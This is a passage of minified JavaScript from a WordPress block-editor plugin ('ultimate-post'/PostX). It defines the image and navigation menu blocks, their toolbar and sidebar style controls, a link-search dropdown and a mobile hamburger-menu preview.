}"}]},btnPadding:{type:"object",default:{lg:{top:"6",bottom:"6",left:"12",right:"12",unit:"px"}},style:[{depends:[{key:"linkType",condition:"==",value:"button"}],selector:"{{ULTP}} .ultp-image-button a { padding:{{btnPadding}}; }"}]},...(0,o.t)(["advanceAttr"],["loadingColor"]),...a.dh}},32294:(e,t,l)=>{"use strict";var o=l(67294),a=l(57283),i=l(74412),n=l(2204);const{__}=wp.i18n,{registerBlockType:r,createBlock:s}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/image.svg",alt:"Image"}),attributes:i.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/image.svg"}},edit:a.Z,transforms:{from:[{type:"block",blocks:["core/image"],transform:()=>s("ultimate-post/image")}]},save:()=>null})},6343:(e,t,l)=>{"use strict";l.d(t,{Z:()=>_});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(87763),s=l(9612),p=l(50960),c=l(2955);const{__}=wp.i18n,{InspectorControls:u,InnerBlocks:d,BlockControls:m}=wp.blockEditor,{Fragment:g,useState:y,useEffect:b,useRef:v,useMemo:h}=wp.element,{Spinner:f,Placeholder:k,Dropdown:w,ToolbarButton:x}=wp.components,{getBlockParentsByBlockName:T}=wp.data.select("core/block-editor");function _(e){const t=v(null),l=v(!1),_=v(""),[C,E]=y(),[S,P]=y(!1),[L,I]=y("Content"),{setAttributes:B,name:U,className:M,attributes:A,clientId:H,attributes:{previewImg:N,blockId:j,advanceId:Z,hasRootMenu:O,previewMobileView:R,menuAlign:D,menuMvInheritCss:z,mvTransformToHam:F,menuInline:W,currentPostId:V,menuHamAppear:G}}=e;b((()=>{const e=H.substr(0,6);(0,i.qi)(B,"",V,H),j?j&&j!=e&&(l.current=!0,B({blockId:e}),setTimeout((()=>{P(!S),l.current=!1}),0)):(l.current=!0,wp.apiFetch({path:"/wp/v2/pages?per_page=4&parent=0"}).then((e=>{let t=[];e&&e.length>0&&"hasRootMenu"!=_.current&&(t=e.map((e=>["ultimate-post/menu-item",{parentMenuInline:W,menuItemText:e.title?.rendered||"No Title",menuItemLink:e.link,contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}]))),l.current=!1,E(t)})).catch((e=>{l.current=!1,E([]),console.error(e)})),B({blockId:e}))}),[H]),b((()=>{const e=t.current;if(e?(e=>{const{menuInline:t,dropIcon:l,iconAfterText:o}=A;if(e.menuInline!=t||e.iconAfterText!=o||e.dropIcon!=l)return!0})(e)&&(0,i.Gu)(H):t.current=A,T(H,["ultimate-post/menu"])?.length>0&&"hasRootMenu"!=O&&(B({hasRootMenu:"hasRootMenu"}),_.current="hasRootMenu"),e?.hasRootMenu!=O||e?.mvTransformToHam!=F||e?.menuHamAppear!=G){let e="";G&&F>0&&"hasRootMenu"!=O&&(e=`\n                    @media (max-width: ${F}px) {\n                        .postx-page {{ULTP}}[data-mv="enable"] > .ultp-menu-wrapper {\n                            display: none;\n                        }\n                        .postx-page {{ULTP}}[data-mv="enable"] > .ultp-mv-ham-icon.ultp-active {\n                            display: block;\n                        }\n                    }\n                `),B({menuMvResCss:e})}t.current=A}),[A]);const q={setAttributes:B,name:U,attributes:A,setSection:I,section:L,clientId:H},$=h((e=>(0,n.Kh)(A,"ultimate-post/menu",j,!1)),[A,H]);if(N)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:N});const K={name:"ultimate-post/menu-item",attributes:{parentMenuInline:W,menuItemText:"Menu Item",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}},J="hasRootMenu"!=O&&R&&!z?"":"ultpMenuCss";return(0,a.createElement)(g,null,(0,a.createElement)(m,null,(0,a.createElement)(c.j,{isSelected:e.isSelected,menuInline:W,clientId:H,menuAlign:D,store:q})),(0,a.createElement)(u,null,(0,a.createElement)(c.H,{store:q,hasRootMenu:O,menuInline:W,menuHamAppear:G})),l.current?(0,a.createElement)(k,{className:"ultp-backend-block-loading ultp-menu-block",label:__("Loading…","ultimate-post")},(0,a.createElement)(f,null)):(0,a.createElement)("div",(0,o.Z)({},Z&&{id:Z},{"data-menuinline":W,className:`ultp-block-${j} ${M} ${J}`}),$&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:$}}),"hasRootMenu"!=O&&R?(0,a.createElement)(p.n,{attributes:A}):(0,a.createElement)("div",{className:`ultp-menu-wrapper _${D}`},(0,a.createElement)("div",{className:"ultp-menu-content"},(0,a.createElement)(d,{template:C?.length?C:[["ultimate-post/menu-item",{parentMenuInline:!0,menuItemText:"Menu #1",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}],["ultimate-post/menu-item",{parentMenuInline:!0,menuItemText:"Menu #2",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}],["ultimate-post/menu-item",{parentMenuInline:!0,menuItemText:"Menu #3",contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}]],defaultBlock:K,allowedBlocks:["ultimate-post/menu-item"],directInsert:!0,renderAppender:!!e.isSelected&&(()=>(0,a.createElement)("div",{className:"ultp-menu-block-appender"},(0,a.createElement)(w,{contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,a.createElement)(x,{label:"Add Item",icon:r.Z.plus,onClick:()=>e()}),renderContent:({onClose:e})=>(0,a.createElement)(s.k,{hasStep:!0,callback:t=>{const{_title:l,_url:o,_target:a}=t;e(),wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/menu-item",{parentMenuInline:W,menuItemText:l,menuItemLink:o,menuLinkTarget:a,contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}),999,H,!1)}})})))})))))}},53283:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{InnerBlocks:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,menuMvInheritCss:n,menuResStructure:r,hasRootMenu:s,menuAlign:p,mvTransformToHam:c,backIcon:u,closeIcon:d,mvHamIcon:m,naviExpIcon:g,naviIcon:y,mvHeadtext:b,menuHamAppear:v,mvAnimationDuration:h,mvDrawerPosition:f,menuInline:k}=e.attributes,w=v&&"hasRootMenu"!=s?{"data-mvtoham":c,"data-rcsstype":n?"own":"custom","data-rstr":r,"data-mv":"hasRootMenu"!=s?"enable":"disable"}:{"data-hasrootmenu":s},x=Object.keys(w),T={"data-animationduration":h,"data-headtext":b};return(0,a.createElement)("div",(0,o.Z)({},l&&{id:l},{"data-bid":t,"data-menuinline":k,className:`ultp-block-${t} ultpMenuCss`},x&&w),v&&"hasRootMenu"!=s&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",(0,o.Z)({},T,{className:"ultp-mv-ham-icon ultp-active"}),"_ultp_mn_ic_"+(m||"hamicon_3")+"_ultp_mn_ic_end_"),(0,a.createElement)("div",{"data-drawerpos":f,className:"ultp-mobile-view-container ultp-mv-trigger"},(0,a.createElement)("div",{className:"ultp-mobile-view-wrapper"},(0,a.createElement)("div",{className:"ultp-mobile-view-head"},(0,a.createElement)("div",{className:"ultp-mv-back-label-con ultpmenu-dnone"},"_ultp_mn_ic_"+(u||"leftAngle2")+"_ultp_mn_ic_end_",(0,a.createElement)("div",{className:"ultp-mv-back-label"},b)),(0,a.createElement)("div",{className:"ultp-mv-close"},"_ultp_mn_ic_"+(d||"close_line")+"_ultp_mn_ic_end_")),(0,a.createElement)("div",{className:"ultp-mobile-view-body"})),(0,a.createElement)("div",{className:"ultp-mv-icons"},(0,a.createElement)("div",{className:"ultp-mv-label-icon"},"_ultp_mn_ic_"+(y||"rightAngle2")+"_ultp_mn_ic_end_"),(0,a.createElement)("div",{className:"ultp-mv-label-icon-expand"},"_ultp_mn_ic_"+(g||"arrowUp2")+"_ultp_mn_ic_end_")))),(0,a.createElement)("div",{className:`ultp-menu-wrapper _${p}`},(0,a.createElement)("div",{className:"ultp-menu-content"},(0,a.createElement)(i.Content,null))))}},2955:(e,t,l)=>{"use strict";l.d(t,{H:()=>v,j:()=>b});var o=l(67294),a=l(53049),i=l(18958),n=l(87763),r=l(92637),s=l(43581),p=l(64766),c=l(9612);const{__}=wp.i18n,{ToolbarGroup:u,ToolbarButton:d,Dropdown:m,Modal:g}=wp.components,{useState:y}=wp.element,b=e=>{const{menuInline:t,clientId:l,isSelected:r,menuAlign:s,store:p}=e,[b,v]=y(!1),h=()=>v(!1);return(0,o.createElement)(o.Fragment,null,r&&(0,o.createElement)(u,{className:"ultp-menu-toolbar-group"},(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",renderToggle:({onToggle:e})=>(0,o.createElement)("div",{className:"ultp-menu-toolbar-add-item",onClick:()=>e()},n.Z.plus,(0,o.createElement)("div",{className:"__label"},__("Add Item","ultimate-post"))),renderContent:({onClose:e})=>(0,o.createElement)(c.k,{hasStep:!0,callback:o=>{const{_title:a,_url:i,_target:n}=o;e(),wp.data.dispatch("core/block-editor").insertBlock(wp.blocks.createBlock("ultimate-post/menu-item",{parentMenuInline:t,menuItemText:a,menuItemLink:i,menuLinkTarget:n,contentHorizontalPosition:{lg:1,ulg:"px"},contentVerticalPosition:{lg:12,ulg:"px"}}),999,l,!1)}})}),(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(d,{label:"Alignment",icon:n.Z[s],onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:10,data:{type:"alignment",key:"menuAlign",block:"menu",inline:!0,disableJustify:!0,icons:["left","center","right"],options:["left","center","right"],label:__("Alignment","ultimate-post")}}],initialOpen:!0,store:p})}),(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(d,{label:"Style",icon:n.Z.styleIcon,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{position:20,data:{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{position:20,data:{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!0,store:p})}),(0,o.createElement)(m,{contentClassName:"ultp-menu-toolbar-drop",focusOnMount:!0,renderToggle:({onToggle:e})=>(0,o.createElement)(d,{label:"Spacing",icon:n.Z.spacing,onClick:()=>e()}),renderContent:({onClose:e})=>(0,o.createElement)(a.df,{title:!1,include:[{position:20,data:{type:"range",key:"menuItemGap",min:0,max:200,step:1,responsive:!0,unit:["px","%"],label:__("Menu item gap","ultimate-post")}}],initialOpen:!0,store:p})}),(0,o.createElement)(d,{className:"ultp-toolbar-template__btn",onClick:()=>v(!0),label:"Patterns"},(0,o.createElement)("span",{className:"dashicons dashicons-images-alt2"})),b&&(0,o.createElement)(g,{isFullScreen:!0,onRequestClose:h},(0,o.createElement)(i.Z,{store:p,closeModal:h}))))},v=({store:e,hasRootMenu:t,menuInline:l,menuHamAppear:i})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(s.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid8819",store:e}),(0,o.createElement)(r.Sections,{callback:t=>{"hamburger"==t.slug?e.setAttributes({previewMobileView:!0}):e.setAttributes({previewMobileView:!1,previewHamIcon:!1})},classes:" ultp-menu-side-settings"},(0,o.createElement)(r.Section,{slug:"global",title:__("Normal View","ultimate-post"),icon:!1},(0,o.createElement)(a.T,{title:"inline",include:[{position:5,data:{type:"toggle",key:"menuInline",label:__("Inline","ultimate-post")}},{position:20,data:{type:"range",key:"menuItemGap",min:0,max:200,step:1,responsive:!0,unit:["px","%"],label:__("Menu item gap","ultimate-post")}},{position:10,data:{type:"alignment",key:"menuAlign",block:"menu",disableJustify:!0,icons:["left","center","right"],options:["left","center","right"],label:__("Alignment","ultimate-post")}},{position:11,data:{type:"alignment",key:"menuAlignItems",block:"menu",disableJustify:!0,icons:l?["alignStartR","alignCenterR","alignEndR","alignStretchR"]:["left_new","center_new","right_new","alignStretch"],options:["flex-start","center","flex-end","stretch"],label:__("Items Alignment","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Menu Items","ultimate-post"),include:[{position:5,data:{type:"typography",key:"itemTypo",label:__("Typography","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"itemColor",label:__("Color","ultimate-post")},{type:"color2",key:"itemBg",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"toggle",key:"currentItemStyle",label:__("User Hover as Active Color","ultimate-post")},{type:"color",key:"itemColorHvr",label:__("Color","ultimate-post")},{type:"color2",key:"itemBgHvr",label:__("Background","ultimate-post")},{type:"boxshadow",key:"itemShadowHvr",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")},{type:"border",key:"itemBorderHvr",label:__("Hover Border","ultimate-post")}]}]}},{position:30,data:{type:"dimension",key:"itemRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:40,data:{type:"dimension",key:"itemPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Item Icon","ultimate-post"),include:[{position:5,data:{type:"toggle",key:"iconAfterText",label:__("Icon After Text","ultimate-post")}},{position:10,data:{type:"range",key:"iconSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"iconSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Spacing","ultimate-post")}},{position:30,data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{position:40,data:{type:"color",key:"iconColorHvr",label:__("Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Dropdown Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"dropIcon",selection:a.ov,label:__("Choose Icon","ultimate-post")}},{position:10,data:{type:"color",key:"dropColor",label:__("Icon Color","ultimate-post")}},{position:10,data:{type:"color",key:"dropColorHvr",label:__("Icon Hover Color","ultimate-post")}},{position:15,data:{type:"range",key:"dropSize",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"range",key:"dropSpacing",min:0,max:200,step:1,responsive:!0,unit:["px"],label:__("Text to Icon Spacing","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Background Wrapper","ultimate-post"),include:[{position:30,data:{type:"color2",key:"menuBg",image:!0,label:__("Background","ultimate-post")}},{position:40,data:{type:"border",key:"menuBorder",label:__("Border","ultimate-post")}},{position:50,data:{type:"boxshadow",key:"menuShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}},{position:60,data:{type:"dimension",key:"menuRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:65,data:{type:"dimension",key:"menuMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:70,data:{type:"dimension",key:"menuPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:80,data:{type:"toggle",key:"inheritThemeWidth",label:__("Inherit Theme Width (Content)","ultimate-post")}},{position:90,data:{type:"range",key:"menuContentWidth",min:0,max:1700,step:1,responsive:!0,unit:["px","%"],label:__("Content Max-Width","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Advanced Style","ultimate-post"),include:[{position:1,data:{type:"text",key:"advanceId",label:__("ID","ultimate-post")}},{position:5,data:{type:"range",key:"advanceZindex",label:__("z-index","ultimate-post"),min:-100,max:1e4,step:1}},{position:30,data:{type:"textarea",key:"advanceCss",label:__("Custom CSS","ultimate-post"),placeholder:__("Add {{ULTP}} before the selector to wrap element.","ultimate-post")}},{position:15,data:{type:"toggle",key:"hideExtraLarge",pro:!0,label:__("Hide On Extra Large Display","ultimate-post")}},{position:20,data:{type:"toggle",key:"hideTablet",pro:!0,label:__("Hide On Tablet","ultimate-post")}},{position:25,data:{type:"toggle",key:"hideMobile",pro:!0,label:__("Hide On Mobile","ultimate-post")}}],initialOpen:!1,store:e})),"hasRootMenu"!=t&&(0,o.createElement)(r.Section,{slug:"hamburger",title:__("Hamburger View","ultimate-post"),icon:p.ZP.hemicon_1_line},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"toggle",key:"menuHamAppear",label:__("Enable Hamburger Menu Conversion","ultimate-post")}},{position:4,data:{type:"range",key:"mvTransformToHam",min:0,max:1400,step:1,unit:["px"],responsive:!1,label:__("Hamburger Breakpoint","ultimate-post")}},i&&{position:9,data:{type:"range",key:"mvPopWidth",min:0,max:1400,step:1,responsive:!1,unit:["px","%"],label:__("Drawer Width","ultimate-post")}},i&&{position:20,data:{type:"select",key:"menuResStructure",inline:!0,justify:!0,pro:!0,options:[{value:"mv_dissolve",label:__("Dissolve","ultimate-post")},{value:"mv_slide",label:__("Slide","ultimate-post")},{value:"mv_accordian",label:__("Accordian","ultimate-post")}],label:__("Navigation Effect","ultimate-post")}},i&&{position:22,data:{type:"dimension",key:"hamExpandedPadding",label:__("Expanded Container Padding","ultimate-post"),step:1,unit:["px"],responsive:!1}},i&&{position:30,data:{type:"range",key:"mvAnimationDuration",min:0,max:2e3,step:1,responsive:!1,unit:!1,label:__("Animation Duration(ms)","ultimate-post")}}],initialOpen:!1,store:e}),i&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)(a.T,{title:__("Hamburger Icon","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"previewHamIcon",label:__("Preview","ultimate-post")}},{position:5,data:{type:"icon",key:"mvHamIcon",hideFilter:!0,label:__("Choose Ham Icon","ultimate-post"),selection:["hemicon_1_line","hemicon_2_line","hemicon_3_line","hamicon_5_line","hamicon_6_line","hemicon_2_solid"]}},{position:10,data:{type:"range",key:"mvHamIconSize",min:6,max:200,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"hamVClr",label:__("Color","ultimate-post")},{type:"color2",key:"hamVBg",label:__("Background","ultimate-post")},{type:"border",key:"hamVBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"hamVRadius",label:__("Border Radius","ultimate-post"),step:1,unit:["px"],responsive:!0},{type:"boxshadow",key:"hamVShadow",label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"hamVClrHvr",label:__("Color","ultimate-post")},{type:"color2",key:"hamVBgHvr",label:__("Background","ultimate-post")},{type:"border",key:"hamVBorderHvr",label:__("Border","ultimate-post")},{type:"dimension",key:"hamVRadiusHvr",label:__("Border Radius","ultimate-post"),step:1,unit:["px"],responsive:!0},{type:"boxshadow",key:"hamVShadowHvr",label:__("Box shadow","ultimate-post")}]}]}},{position:10,data:{type:"dimension",key:"hamVPadding",label:__("Padding","ultimate-post"),step:1,unit:["px"],responsive:!0}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Navigation Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"naviIcon",selection:a.ov,label:__("choose Icon","ultimate-post")}},{position:5,data:{type:"icon",key:"naviExpIcon",label:__("Expanded Icon","ultimate-post")}},{position:10,data:{type:"range",key:"naviIconSize",min:0,max:200,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:10,data:{type:"color",key:"naviIconClr",label:__("Color","ultimate-post")}},{position:10,data:{type:"color",key:"naviIconClrHvr",label:__("Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Close Icon","ultimate-post"),include:[{position:5,data:{type:"icon",key:"closeIcon",selection:["close_line","close_circle_line"],hideFilter:!0,label:__("Choose Close Icon","ultimate-post")}},{position:10,data:{type:"range",key:"closeSize",min:0,max:200,step:1,responsive:!1,label:__("Icon Size","ultimate-post")}},{position:20,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"closeClr",label:__("Icon Color","ultimate-post")},{type:"color",key:"closeWrapBg",label:__("Wrap BG","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"closeClrHvr",label:__("Color","ultimate-post")},{type:"color",key:"closeWrapBgHvr",label:__("Wrap BG Hover","ultimate-post")}]}]}},{position:40,data:{type:"dimension",key:"closeSpace",response:!1,label:__("Spacing","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:45,data:{type:"dimension",key:"closePadding",label:__("Padding","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:50,data:{type:"dimension",key:"closeRadius",label:__("Border Radius","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:55,data:{type:"border",key:"closeBorder",label:__("Border","ultimate-post"),step:1,unit:["px"],responsive:!1}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Menu Items","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"menuMvInheritCss",label:__("Inherit Parent Block CSS","ultimate-post")}},{position:40,data:{type:"color",key:"mvItemColor",label:__("Color","ultimate-post")}},{position:40,data:{type:"color2",key:"mvItemBg",label:__("Background","ultimate-post")}},{position:40,data:{type:"color",key:"mvItemColorHvr",label:__("Hover Color","ultimate-post")}},{position:40,data:{type:"color2",key:"mvItemBgHvr",label:__("Hover Background","ultimate-post")}},{position:40,data:{type:"range",key:"mvItemSpace",label:__("Spacing Between","ultimate-post"),min:0,max:200,step:1,responsive:!1}},{position:40,data:{type:"typography",key:"mvItemTypo",label:__("Typography","ultimate-post")}},{position:40,data:{type:"border",key:"mvItemBorder",label:__("Border","ultimate-post")}},{position:40,data:{type:"dimension",key:"mvItemRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:40,data:{type:"dimension",key:"mvItemPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Menu Header","ultimate-post"),include:[{position:40,data:{type:"color2",key:"mvHeadBg",image:!1,label:__("Header BG","ultimate-post")}},{position:40,data:{type:"dimension",key:"mvHeadPadding",step:1,unit:["px","%","em"],responsive:!0,label:__("Header Padding","ultimate-post")}},{position:40,data:{type:"border",key:"mvHeadBorder",label:__("Header Border","ultimate-post"),step:1,unit:["px"],responsive:!1}},{position:40,data:{type:"text",key:"mvHeadtext",label:__("Menu Label","ultimate-post")}},{position:40,data:{type:"color",key:"backClr",label:__("Label Color","ultimate-post")}},{position:40,data:{type:"color",key:"backClrHvr",label:__("Label Hover Color","ultimate-post")}},{position:40,data:{type:"typography",key:"backTypo",label:__("Label Typography","ultimate-post")}},{position:40,data:{type:"icon",key:"backIcon",label:__("Choose Back Icon","ultimate-post")}},{position:40,data:{type:"range",key:"backIconSize",min:6,max:200,step:1,responsive:!1,label:__("Back Icon Size","ultimate-post")}},{position:40,data:{type:"range",key:"backIconSpace",min:0,max:200,step:1,responsive:!1,label:__("Text to Icon Gap","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Container","ultimate-post"),include:[{position:10,data:{type:"color2",key:"mvBodyBg",label:__("Background","ultimate-post"),image:!1}},{position:20,data:{type:"dimension",key:"mvBodyPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}},{position:30,data:{type:"border",key:"mvBodyBorder",label:__("Border","ultimate-post")}},{position:40,data:{type:"boxshadow",key:"mvBodyShadow",label:__("Box shadow","ultimate-post")}},{position:50,data:{type:"color",key:"mvOverlay",label:__("Background Overlay","ultimate-post"),image:!1}}],initialOpen:!1,store:e})))))},9612:(e,t,l)=>{"use strict";l.d(t,{k:()=>u});var o=l(67294),a=l(22217),i=l(64766);const{__}=wp.i18n,{useState:n,useEffect:r}=wp.element,{TextControl:s,Spinner:p,Placeholder:c}=wp.components,u=e=>{const{callback:t,params:l,hasStep:u}=e,[d,m]=n(""),[g,y]=n(!0),[b,v]=n(1),[h,f]=n({_title:"",_url:"",_target:"_self"}),[k,w]=n([]),[x,T]=n(!1);r((()=>{(e=>{const t=e||(""==d?{isInitialSuggestions:!0,initialSuggestionsSearchOptions:{perPage:"6"}}:{});wp?.coreData?.__experimentalFetchLinkSuggestions(d,t).then((e=>{w(e),g&&y(!1)})).catch((e=>{w([]),console.error("Error fetching link suggestions:",e)}))})(l)}),[d]);const _=(e,l)=>{u?(v(2),f({...h,_title:e||"",_url:l||""})):t({...h,_title:e||"",_url:l||""})},C=(e,t)=>{f({...h,[t]:e})};return 1==b?(0,o.createElement)("div",{className:"ultp-menu-searchdropdown-con"},(0,o.createElement)("div",{className:"ultp-menu-search-text"},(0,o.createElement)("input",{type:"text",placeholder:"Search or Type Url",onChange:e=>m(e.target.value)}),(0,o.createElement)("div",{className:"ultp-menu-search-add "+(d?"__active":""),onClick:()=>d&&_("",d)},i.ZP.top_left_angle_line)),g?(0,o.createElement)(c,{className:"ultp-backend-block-loading ultp-menu-block",label:__("Fetching…","ultimate-post")},(0,o.createElement)(p,null)):(0,o.createElement)("div",{className:"ultp-menu-search-items"},k.map(((e,t)=>(0,o.createElement)("div",{onClick:()=>_(e.title,e.url),key:t},(0,o.createElement)("div",null,e.title),(0,o.createElement)("div",{className:"__type"},e.type)))))):(0,o.createElement)("div",{className:"ultp-section-accordion ultp-section-fetchurl",id:"ultp-sidebar-inline"},(0,o.createElement)("div",{className:"ultp-section-show ultp-toolbar-section-show"},(0,o.createElement)(s,{__nextHasNoMarginBottom:!0,value:h._title,placeholder:"Type Label",label:"Label",onChange:e=>C(e,"_title")}),(0,o.createElement)("div",{className:"ultp-field-selflink"},(0,o.createElement)("label",null,"Link"),(0,o.createElement)("div",null,(0,o.createElement)("span",{className:"ultp-link-section"},(0,o.createElement)("span",{className:"ultp-link-input"},(0,o.createElement)("input",{type:"text",onChange:e=>C(e.target.value,"_url"),value:h._url,placeholder:"Type Url"}),h._url&&(0,o.createElement)("span",{className:"ultp-image-close-icon dashicons dashicons-no-alt",onClick:()=>C("","_url")})),(0,o.createElement)("span",{className:"ultp-link-options"},(0,o.createElement)("span",{className:"ultp-collapse-section",onClick:()=>{T(!x)}},(0,o.createElement)("span",{className:`ultp-short-collapse ${x&&" active"}`})))),x&&(0,o.createElement)("div",{className:"ultp-short-content active"},(0,o.createElement)(a.Z,{value:h._target,label:"Link Target",options:[{value:"_self",label:__("Same Tab","ultimate-post")},{value:"_blank",label:__("New Tab","ultimate-post")}],onChange:e=>C(e,"_target")})))),(0,o.createElement)("div",{className:"ultp-section-fetchurl-add",onClick:()=>t(h)},__("Save","ultimate-post"))))}},50960:(e,t,l)=>{"use strict";l.d(t,{n:()=>i});var o=l(67294),a=l(64766);const i=e=>{const{blockId:t,backIcon:l,closeIcon:i,mvHamIcon:n,naviIcon:r,mvHeadtext:s,previewHamIcon:p,menuAlign:c}=e.attributes,u="right"==c?{"margin-left":"auto"}:"left"==c?{"margin-right":"auto"}:{margin:"auto"};return p?(0,o.createElement)("div",{style:{display:"block",width:"fit-content",...u},className:"ultp-mv-ham-icon ultp-active"},a.ZP[n]):(0,o.createElement)("div",{className:"ultp-mobile-view-container-preview",style:{backgroundImage:`url(${ultp_data.url}assets/img/blocks/menu/mobile_preview.png)`}},(0,o.createElement)("div",{className:"ultp-mobile-view-container ultp-editor"},(0,o.createElement)("div",{className:"ultp-mobile-view-wrapper"},(0,o.createElement)("div",{className:"ultp-mobile-view-head"},(0,o.createElement)("div",{className:"ultp-mv-back-label-con"},a.ZP[l],(0,o.createElement)("div",{className:"ultp-mv-back-label"},s)),(0,o.createElement)("div",{className:"ultp-mv-close"},a.ZP[i])),(0,o.createElement)("div",{className:"ultp-mobile-view-body"},(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item"},(0,o.createElement)("div",{"data-parentbid":`.ultp-block-${t||"null"}`,className:"ultp-menu-item-wrapper"},(0,o.createElement)("div",{className:"ultp-menu-item-label-container"},(0,o.createElement)("a",{className:"ultp-menu-item-label ultp-menuitem-pos-aft"},(0,o.createElement)("div",{className:"ultp-menu-item-label-text"},"Home"))))),(0,o.createElement)("div",{"data-bid":"",className:"wp-block-ultimate-post-menu-item 